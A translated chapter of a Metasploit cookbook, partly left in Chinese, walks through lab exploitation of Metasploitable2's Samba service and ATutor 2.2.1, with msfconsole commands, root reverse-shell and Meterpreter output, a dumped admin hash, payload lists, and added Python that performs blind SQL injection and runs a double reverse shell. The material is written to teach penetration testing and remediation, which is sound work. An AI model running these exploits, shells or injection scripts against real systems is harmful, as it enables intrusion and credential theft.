Metasploit Penetration Testing Cookbook, Third Edition, Chapter 3: Server-Side Exploitation (translation)

Chapter 3: Server-Side Exploitation

In this chapter we will cover the following topics:

1. Attacking Linux servers

2. SQL injection attacks

3. Types of shells

4. Attacking Windows servers

5. Exploiting common services

6. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

7. MS17-010 EternalRomance/EternalSynergy/EternalChampion

8. Installing backdoors

9. Denial-of-service attacks

Introduction

In Chapter 2, Information Gathering and Scanning, we collected the target's IP addresses, ports, services, operating system and so on. The most valuable result of information gathering is the operating system of the server or system. This information is very useful for the subsequent penetration of the target machine, because it lets us quickly look up the services running on the system and their known vulnerabilities. The process is somewhat involved, but having this information greatly reduces the work that follows.

每個操做系統都存在一些缺陷。一旦漏洞被報告出來,漏洞利用程序開發也開始了。得到許可的操做系統,好比Windows,能夠很快爲漏洞或BUG開發補丁程序,並推送給用戶更新。漏洞披露是一個嚴重的問題,特別是 0day 漏洞會對計算機行業形成嚴重破壞。0day 收到高度追捧,在市場上的價格可達 15000美圓到1000000美圓。漏洞被發現並被利用,但漏洞的披露取決於研究人員及其意圖。

Well-known companies such as Microsoft, Apple and Google release patches for their products regularly, because they are accountable to a very large user base. In the enterprise the picture is worse: because of the downtime involved and the need to keep business continuity intact, servers can take weeks to be patched. It is therefore advisable to update, or at least keep a close watch on, any newly discovered vulnerabilities in the operating systems you run. Unpatched systems are an attacker's favourite, since they allow an immediate attack that compromises the target, so operating systems must be patched and updated regularly. In this chapter we focus on vulnerabilities reported in some of the most popular services and operating systems.

During a penetration test, once information about the target operating system is available, the tester starts looking for exploits for specific services or operating-system vulnerabilities. This chapter is therefore our first step into server-side vulnerabilities. We focus on the widely used Windows and Linux operating systems, look at how to use the exploits for these vulnerabilities and set their options so that they run against the target machine, and finally discuss the payloads in the Metasploit Framework.

Before exploiting a target, we need some basics about exploit modules and payloads, such as how to set their options.

To exploit a target we first scan its ports and services; once enough information has been collected, the next step is to choose the matching exploit and run it against the target. Let's look at a few of the exploitation-related commands in msfconsole.

msfconsole, and how to start it, was covered in the previous chapters.

In msfconsole, enter the help command to display the help menu:

msf5 > help                                                                  
                                                                             
Core Commands                                                                
=============                                                                
                                                                             
    Command       Description                                                
    -------       -----------                                                
    ?             Help menu                                                  
    banner        Display an awesome metasploit banner                       
    cd            Change the current working directory                       
    color         Toggle color                                               
    connect       Communicate with a host                                    
    exit          Exit the console                                           
    get           Gets the value of a context-specific variable              
    getg          Gets the value of a global variable                        
    grep          Grep the output of another command                         
    help          Help menu                                                  
    history       Show command history                                       
    load          Load a framework plugin                                    
    quit          Exit the console                                           
    repeat        Repeat a list of commands                                  
    route         Route traffic through a session                            
    save          Saves the active datastores                                
    sessions      Dump session listings and display information about session
    set           Sets a context-specific variable to a value                
    setg          Sets a global variable to a value                          
    sleep         Do nothing for the specified number of seconds             
    spool         Write console output into a file as well the screen        
    threads       View and manipulate background threads      
    ....
        set RHOSTS fe80::3990:0000/110, ::1-::f0f0

Target a block from a resolved domain name:

    set RHOSTS www.example.test/24
msf5 >

The output lists a great many commands, which may look intimidating, but we have already met some of them, such as the database commands. We will now concentrate on the commands that are most useful during the exploitation phase and learn the others as we go.

The most useful command: search

msf5 > search -h
Usage: search [ options ] <keywords>

OPTIONS:
  -h                Show this help information
  -o <file>         Send output to a file in csv format
  -S <string>       Search string for row filter
  -u                Use module if there is one result

Keywords:
  aka         :  Modules with a matching AKA (also-known-as) name
  author      :  Modules written by this author
  arch        :  Modules affecting this architecture
  bid         :  Modules with a matching Bugtraq ID
  cve         :  Modules with a matching CVE ID
  edb         :  Modules with a matching Exploit-DB ID
  check       :  Modules that support the 'check' method
  date        :  Modules with a matching disclosure date
  description :  Modules with a matching description
  full_name   :  Modules with a matching full name
  mod_time    :  Modules with a matching modification date
  name        :  Modules with a matching descriptive name
  path        :  Modules with a matching path
  platform    :  Modules affecting this platform
  port        :  Modules with a matching port
  rank        :  Modules with a matching rank (Can be descriptive (ex: 'good') or numeric with comparison operators (ex: 'gte400'))
  ref         :  Modules with a matching ref
  reference   :  Modules with a matching reference
  target      :  Modules affecting this target
  type        :  Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)

Examples:
  search cve:2009 type:exploit

msf5 >

With search we can look for many things, including modules and vulnerabilities.

1. Attacking Linux servers

Linux是使用最爲普遍的操做系統之一,在前面的章節中,咱們學習瞭如何掃描可用服務和利用漏洞掃描器掃描查找目標漏洞。在本節中,咱們將使用Metasploitable2做爲靶機,咱們將利用Samba服務漏洞對Linux目標機進行攻擊。

準備工做

First, use the services command to query the earlier nmap scan results, filtering on ports 139 and 445:

msf5 > services -c port,info -p 139,445 192.168.177.145           
Services                                                          
========                                                          
                                                                  
host             port  info                                       
----             ----  ----                                       
192.168.177.145  139   Samba smbd 3.X - 4.X workgroup: WORKGROUP  
192.168.177.145  445   Samba smbd 3.X - 4.X workgroup: WORKGROUP  
                                                                  
msf5 >                                                            

Now that we know what the target's Samba service reports, we can look up the corresponding vulnerabilities and then use the search command to find a usable exploit module.

TIP: the nmap banner only tells us "Samba smbd 3.X - 4.X". Metasploitable2 ships Samba 3.0.20-Debian, and the auxiliary/scanner/smb/smb_version module will report the exact version. Details of the Samba 3.0.20 vulnerabilities can be found on the CVE details site, https://www.cvedetails.com.

Filtering search by CVE year, module type and the keyword samba finds the usable exploit modules:

msf5 > search cve:2007 type:exploit samba

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   1  exploit/linux/samba/lsa_transnames_heap    2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   2  exploit/multi/samba/usermap_script         2007-05-14       excellent  No     Samba "username map script" Command Execution
   3  exploit/osx/samba/lsa_transnames_heap      2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow
   4  exploit/solaris/samba/lsa_transnames_heap  2007-05-14       average    No     Samba lsa_io_trans_names Heap Overflow


msf5 >

How to do it

1. Select the exploit module:

msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) >

2. Run info to view the module's information:

msf5 exploit(multi/samba/usermap_script) > info

       Name: Samba "username map script" Command Execution
     Module: exploit/multi/samba/usermap_script
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2007-05-14
......
Description:
  This module exploits a command execution vulnerability in Samba
  versions 3.0.20 through 3.0.25rc3 when using the non-default
  "username map script" configuration option. By specifying a username
  containing shell meta characters, attackers can execute arbitrary
  commands. No authentication is needed to exploit this vulnerability
  since this option is used to map usernames prior to authentication!
References:
  https://cvedetails.com/cve/CVE-2007-2447/
  OSVDB (34700)
  http://www.securityfocus.com/bid/23972
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
  http://samba.org/samba/security/CVE-2007-2447.html

msf5 exploit(multi/samba/usermap_script) >

The module description tells us it exploits a command execution vulnerability in Samba 3.0.20 through 3.0.25rc3. Let's try it.

3. Set the options

Use show missing to list the required options that still need a value:

msf5 exploit(multi/samba/usermap_script) > show missing

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier

msf5 exploit(multi/samba/usermap_script) >

TIP: to display a module's advanced options, use the show advanced command.

Here we only need to set the target's IP address, which we do with set <option> <value>:

msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.177.145
RHOSTS => 192.168.177.145
msf5 exploit(multi/samba/usermap_script) >

4. Exploit

Run exploit:

msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 192.168.177.143:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 48vnI4nfAB1GTD5d;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "48vnI4nfAB1GTD5d\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.177.143:4444 -> 192.168.177.145:51353) at 2019-04-26 13:14:08 +0800


Once the exploit succeeds we have a session on the target machine. We can run a few commands to confirm what access we have:

hostname                                                                                         
metasploitable                                                                                   
ip a show                                                                                        
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue                                            
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00                                        
    inet 127.0.0.1/8 scope host lo                                                               
    inet6 ::1/128 scope host                                                                     
       valid_lft forever preferred_lft forever                                                   
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000                   
    link/ether 00:0c:29:cc:9a:ea brd ff:ff:ff:ff:ff:ff                                           
    inet 192.168.177.145/24 brd 192.168.177.255 scope global eth0                                
    inet6 fe80::20c:29ff:fecc:9aea/64 scope link                                                 
       valid_lft forever preferred_lft forever                                                   
3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000                                     
    link/ether 00:0c:29:cc:9a:f4 brd ff:ff:ff:ff:ff:ff                                           
id
uid=0(root) gid=0(root)  

Ctrl+Z sends the session to the background:

uid=0(root) gid=0(root)
^Z  // press Ctrl+Z
Background session 1? [y/N]  y
msf5 exploit(multi/samba/usermap_script) >

五、要操做會話,可用使用sessions命令

msf5 exploit(multi/samba/usermap_script) > sessions -h
Usage: sessions [options] or sessions [id]

Active session manipulation and interaction.

OPTIONS:

    -C <opt>  Run a Meterpreter Command on the session given with -i, or all
    -K        Terminate all sessions
    -S <opt>  Row search filter.
    -c <opt>  Run a command on the session given with -i, or all
    -d        List all inactive sessions
    -h        Help banner
    -i <opt>  Interact with the supplied session ID
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -n <opt>  Name or rename a session by ID
    -q        Quiet mode
    -s <opt>  Run a script or module on the session given with -i, or all
    -t <opt>  Set a response timeout (default: 15)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List all active sessions in verbose mode
    -x        Show extended information in the session table

Many options allow specifying session ranges using commas and dashes.
For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6

msf5 exploit(multi/samba/usermap_script) >

6. To return to the session, use sessions -i <session_id>; sessions -l lists all active sessions:

msf5 exploit(multi/samba/usermap_script) > sessions -l

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.177.143:4444 -> 192.168.177.145:51353 (192.168.177.145)

msf5 exploit(multi/samba/usermap_script) > sessions -i 1
[*] Starting interaction with 1...

id
uid=0(root) gid=0(root)
ip a show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:cc:9a:ea brd ff:ff:ff:ff:ff:ff
    inet 192.168.177.145/24 brd 192.168.177.255 scope global eth0
    inet6 fe80::20c:29ff:fecc:9aea/64 scope link
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000
    link/ether 00:0c:29:cc:9a:f4 brd ff:ff:ff:ff:ff:ff


To terminate a session, press Ctrl+C:

link/ether 00:0c:29:cc:9a:f4 brd ff:ff:ff:ff:ff:ff
^C  //Ctrl+C 
Abort session 1? [y/N]  y // type y
""

[*] 192.168.177.145 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(multi/samba/usermap_script) >

How it works

Samba is the service used for printing and file sharing between Linux and Windows. The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the SamrChangePassword function, when the "username map script" option in smb.conf is enabled (it is not enabled by default), and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in remote printer and file share management. The exploit module supplies a username containing shell metacharacters, so the attacker can execute arbitrary commands. Because this option is used to map usernames before authentication, no authentication is needed to exploit the vulnerability.
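To make the mechanism concrete, here is an added Python illustration (not code from the book, and not Samba's own source) of what "username map script" does with a username. The configured script is a hypothetical stand-in, a printf that echoes the mapped name; the vulnerable function builds the command line the way the affected smbd versions did, substituting %u into a string and handing it to /bin/sh, while the hardened function runs the same script through an argument vector after allow-listing the name. The hardened variant is a generic remediation, not a reproduction of the Samba 3.0.25 patch, and the crafted username only writes a marker to stderr instead of carrying a payload.

```python
"""CVE-2007-2447 in miniature: shell metacharacters in a username reach the
'username map script' hook before authentication.

Added illustration, not code from the book or from Samba.  MAP_COMMAND is a
hypothetical mapping script (a printf that echoes the mapped name); the two
map functions stand in for smbd.
"""
import re
import subprocess

# smb.conf would say: username map script = /etc/samba/map.sh %u
# The stand-in script just prints the name it was handed.
MAP_COMMAND = "printf 'mapped:%s\\n'"

# Crafted username in the style of the exploit module: the backquoted command
# is executed with smbd's privileges.  A real exploit plants its payload
# there; this one only writes a marker to stderr so the effect is visible.
CRAFTED_USER = "/=`echo INJECTED >&2`"

# Allow-list for the hardened path: plain account names only.
SAFE_USER = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def vulnerable_map(username):
    """Pre-fix behaviour: %u is expanded by string substitution and the
    result is run through a shell, so everything the client put in the
    username is parsed by sh.  Returns (stdout, stderr) of that shell."""
    cmdline = f"{MAP_COMMAND} %u".replace("%u", username)
    proc = subprocess.run(cmdline, shell=True, capture_output=True, text=True)
    return proc.stdout, proc.stderr


def hardened_map(username):
    """Same mapping, but the username must pass the allow-list and the
    script is started with an argv list, so no shell ever parses it."""
    if not SAFE_USER.match(username):
        raise ValueError(f"rejected username: {username!r}")
    proc = subprocess.run(["printf", "mapped:%s\\n", username],
                          capture_output=True, text=True, check=True)
    return proc.stdout


def rejects(username):
    """True if the hardened path refuses the username."""
    try:
        hardened_map(username)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(vulnerable_map("alice"))        # ('mapped:alice\n', '')
    print(vulnerable_map(CRAFTED_USER))   # ('mapped:/=\n', 'INJECTED\n')
    print(hardened_map("alice"))          # mapped:alice
    print(rejects(CRAFTED_USER))          # True
```

With the vulnerable path the backquoted command runs before the script is even called, which is exactly why the module needs no credentials: the name is mapped first and authenticated afterwards. Rejecting odd names is a useful belt-and-braces measure, but the argv list is the part that removes the shell from the picture.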

What about the payload?

We did not specify a payload, so Metasploit chose a default for us. show options displays it:

msf5 exploit(multi/samba/usermap_script) > show options                                    
                                                                                           
Module options (exploit/multi/samba/usermap_script):                                       
                                                                                           
   Name    Current Setting  Required  Description                                          
   ----    ---------------  --------  -----------                                          
   RHOSTS  192.168.177.145  yes       The target address range or CIDR identifier          
   RPORT   139              yes       The target port (TCP)                                
                                                                                           
                                                                                           
Payload options (cmd/unix/reverse):                                                        
                                                                                           
   Name   Current Setting  Required  Description                                           
   ----   ---------------  --------  -----------                                           
   LHOST  192.168.177.143  yes       The listen address (an interface may be specified)    
   LPORT  4444             yes       The listen port                                       
                                                                                           
                                                                                           
Exploit target:                                                                            
                                                                                           
   Id  Name                                                                                
   --  ----                                                                                
   0   Automatic                                                                           
                                                                                           
                                                                                           
msf5 exploit(multi/samba/usermap_script) >                                                 

As the output shows, the payload in use is cmd/unix/reverse, a Unix reverse shell (listed as "Unix Command Shell, Double Reverse TCP (telnet)" below) that connects back to LHOST:LPORT on the attacker's machine.

show payloads lists all payloads compatible with the current exploit module:

msf5 exploit(multi/samba/usermap_script) > show payloads

Compatible Payloads
===================

   #   Name                                Disclosure Date  Rank    Check  Description
   -   ----                                ---------------  ----    -----  -----------
   1   cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   2   cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   3   cmd/unix/bind_inetd                                  normal  No     Unix Command Shell, Bind TCP (inetd)
   4   cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   5   cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   6   cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   7   cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   8   cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   9   cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   10  cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   11  cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   12  cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   13  cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   14  cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   15  cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   16  cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   17  cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   18  cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   19  cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   20  cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   21  cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   22  cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   23  cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   24  cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   25  cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   26  cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   27  cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   28  cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   29  cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   30  cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   31  cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   32  cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   33  cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   34  cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   35  cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)

msf5 exploit(multi/samba/usermap_script) >

We can also upgrade a shell session to a Meterpreter session with sessions -u <session_id>, which gives us Meterpreter's advanced features. Meterpreter is covered in detail in a later chapter. The upgrade runs post/multi/manage/shell_to_meterpreter, which starts a second handler (port 4433 below) and opens a new session alongside the original shell:

msf5 exploit(multi/samba/usermap_script) > sessions -u 2
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [2]

[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.177.143:4433
[*] Sending stage (985320 bytes) to 192.168.177.145
[*] Meterpreter session 3 opened (192.168.177.143:4433 -> 192.168.177.145:35189) at 2019-04-26 13:46:35 +0800
[*] Command stager progress: 100.00% (773/773 bytes)

2. SQL injection

Metasploit has several exploit modules for SQL injection vulnerabilities, which let us test and verify whether a target is vulnerable.

準備工做

We will install a vulnerable open-source LMS, ATutor 2.2.1, for testing. Go to www.exploit-db.com/exploits/39… and click the download button next to VULNERABLE APP to download ATutor 2.2.1.

TIP: for installing ATutor, refer to the official documentation.

怎麼作

The module exploits a SQL injection vulnerability and an authentication weakness in ATutor 2.2.1, which means we can bypass authentication, reach the administrator's interface and upload malicious code.

1. Use the exploit/multi/http/atutor_sqli module and view its options:

msf5 > use  exploit/multi/http/atutor_sqli
msf5 exploit(multi/http/atutor_sqli) > show options

Module options (exploit/multi/http/atutor_sqli):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /ATutor/         yes       The path of Atutor
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/http/atutor_sqli) >

2. Before attacking, run the check command to test whether the target is vulnerable, then run the exploit:

msf5 exploit(multi/http/atutor_sqli) > check
[+] 192.168.177.139:80 - The target is vulnerable.
msf5 exploit(multi/http/atutor_sqli) >
msf5 exploit(multi/http/atutor_sqli) > exploit

[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.139:80 - Dumping the username and password hash...
[+] 192.168.177.139:80 - Got the root's hash: 9c352326223a09bc610ff4919e611bed3fbb28f5 !
[*] Sending stage (38247 bytes) to 192.168.177.139
[*] Meterpreter session 13 opened (192.168.177.143:4444 -> 192.168.177.139:50088) at 2019-04-28 13:53:36 +0800
[!] This exploit may require manual cleanup of 'ytux.php' on the target
[!] This exploit may require manual cleanup of '/var/content/module/zyq/ytux.php' on the target

meterpreter >

Recovering the hash through the injection can take some time. Once the exploit succeeds we have a Meterpreter session; note the warning that the PHP file the module uploaded may need manual cleanup on the target:

meterpreter > getuid
Server username: Administrator (0)
meterpreter > sysinfo
Computer    : WIN-BGKRU85VR4H
OS          : Windows NT WIN-BGKRU85VR4H 6.1 build 7600 (Windows 7 Business Edition) i586
Meterpreter : php/windows
meterpreter >
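The "Dumping the username and password hash" step above is what a boolean-based blind injection looks like from the inside. The following Python is an added illustration, not ATutor's code and not the Metasploit module's: an in-memory SQLite table called members (a hypothetical schema) stands in for the LMS user table, search_member_vulnerable() stands in for a search page that pastes the query string into its WHERE clause and reveals only whether anything matched, and search_member_fixed() is the same query with a bound parameter. The admin row is constructed sample data; its hash value is arbitrary hex.

```python
"""Boolean-based blind SQL injection recovering a password hash, next to the
parameterised query that stops it.

Added illustration with an in-memory SQLite database; not ATutor's code and
not Metasploit's module.  Schema and rows are constructed sample data.
"""
import sqlite3

HEX = "0123456789abcdef"

# Constructed sample rows (hypothetical schema: member_id, login, password).
SAMPLE_ROWS = [
    (1, "admin", "9c352326223a09bc610ff4919e611bed3fbb28f5"),
    (2, "student", "0d9f1a2b3c4d5e6f708192a3b4c5d6e7f8091a2b"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (member_id INTEGER PRIMARY KEY, "
               "login TEXT, password TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?, ?)", SAMPLE_ROWS)
    return db


def search_member_vulnerable(db, needle):
    """Vulnerable search: user input is concatenated into the SQL text.
    Returns only True/False (a row was found or not), which is all a
    boolean-based blind injection needs."""
    sql = f"SELECT member_id FROM members WHERE login LIKE '%{needle}%'"
    return db.execute(sql).fetchone() is not None


def search_member_fixed(db, needle):
    """Same search with a bound parameter: the input can only ever be data."""
    sql = "SELECT member_id FROM members WHERE login LIKE ?"
    return db.execute(sql, (f"%{needle}%",)).fetchone() is not None


def extract_hash(oracle, member_id=1, length=40):
    """Recover members.password for one row one hex digit at a time.

    oracle(needle) -> bool is the search page.  Each probe closes the LIKE
    string, appends our own condition and comments out the rest of the
    original statement, e.g.
        login LIKE '%' AND member_id=1 AND substr(password,1,1)='9' -- %'
    Returns (recovered string, number of requests issued); the request
    count is why this kind of exploit takes a while against a real server.
    """
    recovered = ""
    queries = 0
    for pos in range(1, length + 1):
        for c in HEX:
            payload = (f"' AND member_id={member_id}"
                       f" AND substr(password,{pos},1)='{c}' -- ")
            queries += 1
            if oracle(payload):
                recovered += c
                break
        else:
            # No candidate matched: the injection is not reaching the query
            # (or the value is shorter than expected); stop rather than guess.
            break
    return recovered, queries


if __name__ == "__main__":
    db = make_db()
    print(extract_hash(lambda s: search_member_vulnerable(db, s)))
    # ('9c352326223a09bc610ff4919e611bed3fbb28f5', 321)
    print(extract_hash(lambda s: search_member_fixed(db, s)))
    # ('', 16): the parameterised query never leaks a digit
```

Against a real web application each of those probes is an HTTP request, and a character set wider than hex or a slow server multiplies the time accordingly; binary search over the character's ordinal is the usual optimisation. The fix is the bound parameter, not input filtering: the same needle that drives the extraction is harmless as data.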

3. Types of shells

Before moving on to the next section, let's discuss the types of shell available. Broadly there are two kinds: bind shells and reverse shells.

A bind shell (also called a forward-connect shell) is a program that listens on a port on the target machine and lets the attacker connect to it. Bind shells suit local exploitation, for example when you have already compromised a machine through phishing and want to escalate privileges through a local service, but they are not suited to remote attacks, because the target usually sits behind a firewall that blocks inbound connections to arbitrary ports.

So most of the time we use a reverse shell as the payload. With a reverse shell the attacker listens on a port and the payload, once running on the target, connects back to it. Since firewalls mostly restrict inbound traffic, a reverse shell is far more likely to get through. Where outbound traffic is filtered as well, the next thing to try is a port or protocol the target is allowed to use, for example the HTTP/HTTPS reverse payloads.
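The Samba exploit above used cmd/unix/reverse, whose handler accepted two connections, wrote an echo command to both and then announced "A is input". The following Python is an added illustration of that double reverse shell exchange, not Metasploit's handler code: target_side() stands in for the telnet|sh|telnet pipeline the real payload builds on the victim (one connection feeds the shell's input, the other carries its output, and which one reaches the listener first is not under the attacker's control), and DoubleHandler is a from-scratch listener that probes both sockets to tell them apart. Everything runs on 127.0.0.1 with an OS-chosen port, and every command executed is harmless.

```python
"""A reverse shell the way cmd/unix/reverse does it: the target opens two TCP
connections back to the listener, and the handler uses an echo probe to work
out which one is input and which is output.

Added illustration, not Metasploit's code.  Both sides run on loopback.
"""
import secrets
import select
import socket
import subprocess
import threading
import time


def target_side(lhost, lport, output_first=False):
    """Runs where the payload would: connect twice, read commands from one
    socket, run them, write their output to the other."""
    first = socket.create_connection((lhost, lport))
    second = socket.create_connection((lhost, lport))
    out, cmd_in = (first, second) if output_first else (second, first)
    with cmd_in.makefile("r") as lines:
        for line in lines:
            line = line.strip()
            if line == "exit":
                break
            proc = subprocess.run(line, shell=True, capture_output=True, text=True)
            out.sendall((proc.stdout + proc.stderr).encode())
    out.close()
    cmd_in.close()


class DoubleHandler:
    """The listener side: accept two clients, probe them, then run commands."""

    def __init__(self, host="127.0.0.1"):
        self.srv = socket.socket()
        self.srv.bind((host, 0))          # port 0: let the OS pick a free port
        self.srv.listen(2)
        self.host, self.port = self.srv.getsockname()
        self.cmd_in = self.out = None

    def accept_pair(self, timeout=5.0):
        """Accept both connections; return the label of the input socket."""
        a, _ = self.srv.accept()          # "Accepted the first client connection"
        b, _ = self.srv.accept()          # "Accepted the second client connection"
        token = secrets.token_hex(8)
        probe = f"echo {token};\n".encode()
        a.sendall(probe)                  # "Writing to socket A"
        b.sendall(probe)                  # "Writing to socket B"
        seen = {a: b"", b: b""}
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:
            ready, _, _ = select.select([a, b], [], [], 0.2)
            for s in ready:
                seen[s] += s.recv(4096)
                if token.encode() in seen[s]:
                    # The socket that echoed the token carries sh's output,
                    # so the other one must be feeding sh's input.
                    self.out = s
                    self.cmd_in = b if s is a else a
                    return "A" if self.cmd_in is a else "B"
        raise TimeoutError("neither socket echoed the probe")

    def run(self, cmd):
        """Send one command and collect its output up to an end marker."""
        marker = secrets.token_hex(8)
        self.cmd_in.sendall(f"{cmd}; echo {marker}\n".encode())
        data = b""
        while marker.encode() not in data:
            chunk = self.out.recv(4096)
            if not chunk:
                break
            data += chunk
        return data.decode().split(marker, 1)[0]

    def close(self):
        self.cmd_in.sendall(b"exit\n")
        for s in (self.cmd_in, self.out, self.srv):
            s.close()


def demo(output_first=False):
    """Full exchange on loopback; returns (command output, input-socket label)."""
    h = DoubleHandler()
    t = threading.Thread(target=target_side, args=(h.host, h.port, output_first),
                         daemon=True)
    t.start()
    label = h.accept_pair()
    result = h.run("echo hello-from-target")
    h.close()
    t.join(5)
    return result.strip(), label


if __name__ == "__main__":
    print(demo())                    # ('hello-from-target', 'A')
    print(demo(output_first=True))   # ('hello-from-target', 'B')
```

The probe is the whole trick: whichever socket hands the token back is the shell's stdout, and the matching step in the exploit output corresponds to the loop in accept_pair(). Turning this into a bind shell only swaps which side calls listen() and which side calls connect(); the exchange afterwards is identical, which is why the same exploit can carry either kind of payload.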

Payloads

Metasploit has three different kinds of payload module: singles, stagers and stages.

Singles: stand-alone payloads, self-contained programs that are delivered to the target and run directly, such as shell_bind_tcp.

Stagers: small, reliable payloads whose only job is to set up the network connection and fetch a stage; they are used together with stages.

Stages: the payload components a stager downloads once it has a stable connection; they provide the advanced functionality, for example shell, meterpreter, dllinject, patchupdllinject, upexec and vncinject. Meterpreter in Metasploit is itself a payload and needs a stager and a stage working together. In module names a slash between the payload and the transport (php/meterpreter/reverse_tcp) denotes a staged payload, while an underscore (php/meterpreter_reverse_tcp, described as Inline) denotes a stageless single.

準備工做

In the previous section on SQL injection we already have a working exploit, so we will use it to test different kinds of payload.

怎麼作

1. Use show payloads to display the compatible payloads:

msf5 exploit(multi/http/atutor_sqli) > show payloads

Compatible Payloads
===================

   #   Name                                Disclosure Date  Rank    Check  Description
   -   ----                                ---------------  ----    -----  -----------
   1   generic/custom                                       normal  No     Custom Payload
